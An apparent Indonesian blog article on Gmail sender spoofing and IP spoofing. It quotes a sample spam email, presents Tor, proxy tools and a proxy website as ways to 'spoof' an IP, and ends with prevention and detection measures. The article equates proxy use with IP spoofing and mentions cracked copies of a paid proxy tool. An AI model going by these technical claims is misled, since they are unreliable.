Baru-baru ini heboh tentang spoofing attack pada gmail. Ciri-ciri sederhananya adalah, pada folder inbox maupun spam, terdapat email dengan sender dari “me” yang berarti kita sendiri. Ciri lainnya adalah terkirimnya email ke seluruh kontak di akun kita, sehingga menghasilkan spam bagi orang lain. Sungguh hal yang mengerikan. Cara kerja spoofing attack sangat sederhana. Seseorang dari luar mengirimkan email ke orang lain dengan menggunakan alamat email anda. Cara mereka adalah dengan melakukan forging atau menimpa alamat email anda. penjelasannya seperti ini. ” Ketika Anda mengirim surat melalui pos, biasanya Anda menulis alamat di amplop sehingga penerima dapat mengidentifikasi pengirim, dan kantor pos dapat kembali mail ke pengirim apabila terjadi masalah. Tapi tidak ada yang menghalangi Anda untuk menulis alamat pengirim yang berbeda dari Anda sendiri, bahkan, orang lain bisa mengirim surat dan taruh alamat apa saja di amplop. Email bekerja dengan cara yang sama. Ketika server mengirim pesan email, server akan mengidentifikasi si pengirim, tapi  bagian pengirim in dapat dipalsukan. Jika ada masalah dengan pengiriman dan seseorang menempa alamat Anda pada pesan, maka pesan akan dikembalikan kepada Anda, bahkan jika Anda tidak pengirim yang sebenarnya. ”

Jika anda menerima balasan email yang tidak dikirim dari akun gmail anda, maka 2 hal ini kemungkinan terjadi :
1. email anda ditempa oleh orang lain (belum pada taraf pengambil-alihan)
2. pengirim asli akan menggunakan alamat email anda sebagai alamat balasan, sehingga dia bisa merajalela mengirimkan spam ke orang lain.

Mau tau contoh spamnya ? berikut ini kutipan dari emailnya:
Hi ,my friend, How are you?
Recently i buy products from www.XXX.XXX.The products on
it is very good. The chinese traditional festival–Spring Festival
will come, which is the best sale season for chinese people. Now they
sell the products at big discountprice.The price is very
low.They sell these products: MP3,TV,Motorbike,Cellphone,
Laptop etc.
You should spend some time on having a look,maybe you may find what
you like.Wish your whole family member happy and healthy

Spoofing attack dapat dilakukan secara fisik maupun dalam dunia elektronik.Setelah serangan dengan IP spoofing, muncul beberapa bentuk penyerangan seperti DNS spoofing, FTP attack dan Web Spoofing dimana attacker memalsukan URL dari  seluruh World Wide Web. sehingga pengunjung situs mengacu ke server yang dimiliki penyerang dari pada ke web server yang sebenarnya Seluruh metode penyerangan ini mempunyai tujuan yang sama yaitu mendapatkan akses dengan cara menyesatkan pengguna.

Cara Melakukan Spoofing
Ada banyak cara melakukan spoofing IP baik dengan tool maupun manual, diantaranya adalah:
1. TOR
TOR merupakan proyek open source yang dibuat tahun 2001 dan masih dikembangkan sampai sekarang.tor menggunakan konsep yang dinamakan sebagaionion proxy dimana data yang dikirimkan ketempat tujuan akan melalui beberapa proxy yang berbeda-beda setiap waktu yang dipilih secara acak. cara menggunakannya cukup mudah,tinggal jalankan programnya tunggu sebentar lalu akan muncul firefox bawaan tor lalu silahkan cek ip address maka ip addressnya akan tersamarkan.bila ingin memiliki tool ini silahkan download di website resminya yaitu http://www.torproject.org/download/download-easy.html.en

2. Proxy Switcher
untuk menggunakan tool ini pertama kali ini klik tombol download server lalu klik 2x pada proxy yang kita ingin gunakan maka secara otomatis setting dibrowser kita akan berubah menjadi proxy yang kita pilih tadi,hanya saja program ini berlisensi alias berbayar tapi banyak juga tersebar crack untuk program ini.

3. Anonymouse.org
Anonymouse bukanlah program melainkan sebuah website yang menawarkan penyamaran IP kita.kita hanya memasukkan alamat website yang akan dikunjungi dan anonymouse.org akan membukakan website tersebut melalui proxy yang mereka kelola.bila ingin mencoba bisa langsung ke websitenya yaitu http://anonymouse.urg/

Cara Pencegahan IP Spoofing
·         Memasang Filter di Router dengan memanfaatkan ”ingress dan engress filtering” pada router merupakan langkah pertama dalam mempertahankan diri dari spoofing. Kita dapat memanfaatkan ACL(acces control list) untuk memblok alamat IP privat di dalam jaringan untuk downstream
·         Enkripsi dan Authentifikasikita harus mengeliminasi semua authentikasi berdasarkan host, yang di gunakan pada komputer dengan subnet yang sama.

Ada beberapa langkah pencegahan yang dapat kita lakuakan untuk membatasi resiko dari IP spoofing dalam jaringan, antara lain :

Memasang Filter di Router – dengan memanfaatkan ”ingress dan engress filtering” pada router merupakan langkah pertama dalam mempertahankan diri dari spoofing. Kita dapat memanfaatkan ACL(acces control list) untuk memblok alamat IP privat di dalam jaringan untuk downstream. Dilakukan dengan cara mengkonfigurasi router-router agar menahan paket-paket yang datang dengan alamat sumber paket yang tidak legal (illegitimate).
Teknik semacam ini membutuhkan router dengan sumber daya yang cukup untuk memeriksa alamat sumber setiap paket dan memiliki knowledge yang cukup besar agar dapat membedakan antara alamat yang legal dan yang tidak.

Enkripsi dan Authentifikasi – kita juga dapat mengatasi IP spoofing dengan mengimplementasi kan authentifikasi dan enkripsi data. Kedua fitur ini sudah digunakan pada Ipv6. Selanjutnya kita harus mengeliminasi semua authentikasi berdasarkan host, yang di gunakan pada komputer dengan subnet yang sama.
Pastikan authentifikasi di lakukan pada sebuah jalur yang aman dalam hal ini jalur yang sudah di enkripsi.

1.  Gunakan authentifikasi berbasis exchange key antara komputer dalam jaringan, seperti IPsec akan menurunkan resiko jaringan terserang spoofing.
2.      Gunakan daftar access control untuk menolak alamat IP privat dalam downsteram interface.
3.      Gunakan filter pada aliran inbound dan outbound .
4.      Konfigurasi router dan switch dengan sedemikian rupa sehingga dapat menolak paket dari luar network yang mengaku sebagai paket yang berasal dari dalam network.
5.  Aktifkan enkripsi session di router sehingga trusted host yang berasal dari luar jaringan anda dapat berkomunikasi dengan aman ke local host anda.

Metode identifikasi IP spoofing
Ada beberapa teknik yang dapat digunakan untuk mendeteksi IP spoofing, di bawah ini saya akan memberikan penjelasan singkat untuk tiap-tiap teknik:
  • Unicast Reverse Path Forwarding (uRPF)
  • Hop Count Filtering (HCF)
  • Path Identification (PI)
  • Spoofing Prevention Method (SPM) scheme
  • Packet Passport System (PPS)
  • Network Ingress Filtering
  • Bogon Route